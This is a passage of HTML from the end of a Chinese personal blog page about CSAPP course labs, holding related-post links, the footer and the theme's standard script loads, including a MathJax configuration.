href="/2019/11/20/CSAPP-lab2/"><img class="next-cover" data-lazy-src="https://source.unsplash.com/random/500x500/?mountain" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">CSAPP-lab2:bomb</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2019/12/20/CSAPP-Malloc-lab/" title="CSAPP:Malloc lab"><img class="relatedPosts_cover" data-lazy-src="https://source.unsplash.com/random/500x500/?sea"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2019-12-20</div><div class="relatedPosts_title">CSAPP:Malloc lab</div></div></a></div><div class="relatedPosts_item"><a href="/2019/11/20/CSAPP-lab1/" title="CSAPP-lab1:datalab"><img class="relatedPosts_cover" data-lazy-src="https://source.unsplash.com/random/500x500/?sea"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2019-11-20</div><div class="relatedPosts_title">CSAPP-lab1:datalab</div></div></a></div><div class="relatedPosts_item"><a href="/2019/12/14/CSAPP-lab9/" title="CSAPP:Shell lab"><img class="relatedPosts_cover" data-lazy-src="https://source.unsplash.com/random/500x500/?autumn"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2019-12-14</div><div class="relatedPosts_title">CSAPP:Shell lab</div></div></a></div><div class="relatedPosts_item"><a href="/2019/11/20/CSAPP-lab2/" title="CSAPP-lab2:bomb"><img class="relatedPosts_cover" data-lazy-src="https://source.unsplash.com/random/500x500/?mountain"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2019-11-20</div><div class="relatedPosts_title">CSAPP-lab2:bomb</div></div></a></div><div class="relatedPosts_item"><a href="/2019/12/06/CSAPP-lab7/" title="CSAPP-lab7:Cache"><img class="relatedPosts_cover" data-lazy-src="https://source.unsplash.com/random/500x500/?fish"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2019-12-06</div><div class="relatedPosts_title">CSAPP-lab7:Cache</div></div></a></div></div></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 By Autumn-Cat</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="font_plus" type="button" title="放大字体"><i class="fas fa-plus"></i></button><button id="font_minus" type="button" title="缩小字体"><i class="fas fa-minus"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module" defer></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js" async></script><div class="js-pjax"><script>if (!window.MathJax) {
  window.MathJax = {
    loader: {
      source: {
        '[tex]/amsCd': '[tex]/amscd'
      }
    },
    tex: {
      inlineMath: [ ['$','$'], ["\\(","\\)"]],
      tags: 'ams'
    },
    options: {
      renderActions: {
        findScript: [10, doc => {
          for (const node of document.querySelectorAll('script[type^="math/tex"]')) {
            const display = !!node.type.match(/; *mode=display/)
            const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display)
            const text = document.createTextNode('')
            node.parentNode.replaceChild(text, node)
            math.start = {node: text, delim: '', n: 0}
            math.end = {node: text, delim: '', n: 0}
            doc.math.push(math)
          }
        }, '']
      }
    }
  }
  
  var script = document.createElement('script')
  script.src = 'https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js'
  script.id = 'MathJax-script'
  script.async = true
  document.head.appendChild(script)
} else {
  MathJax.startup.document.state(0)
  MathJax.texReset()
  MathJax.typeset()
}</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div><!-- hexo-inject:begin --><!-- hexo-inject:end --></body></html>